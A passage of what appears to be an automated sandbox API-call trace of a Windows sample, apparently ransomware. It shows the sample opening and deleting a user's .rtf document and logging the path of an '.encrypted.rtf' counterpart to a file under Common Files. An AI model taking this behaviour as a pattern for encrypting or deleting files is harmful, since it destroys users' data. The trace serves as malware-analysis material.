[0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.494] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.494] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.495] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\fe6emki1ftxh0mxk.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.495] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.495] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.496] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.496] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.496] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.496] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.496] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.496] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFilePart=0x0) returned 0x58 [0033.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x13d8e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0x7c2240 [0033.497] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\fe6emki1ftxh0mxk.rtf")) returned 1 [0033.499] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x13d8e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0 [0033.499] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.499] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.499] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.499] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.500] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.500] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.500] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.500] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.500] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.500] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.501] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.501] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x1046, lpOverlapped=0x0) returned 1 [0033.501] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.501] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1046, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.501] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.encrypted.rtf\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0033.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x65) returned 0x7c10a8 [0033.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.encrypted.rtf\r\n", cchWideChar=101, lpMultiByteStr=0x7c10a8, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 101 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0033.501] WriteFile (in: hFile=0x128, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x64, lpOverlapped=0x0) returned 1 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.501] CloseHandle (hObject=0x128) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.502] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.503] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.504] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.504] 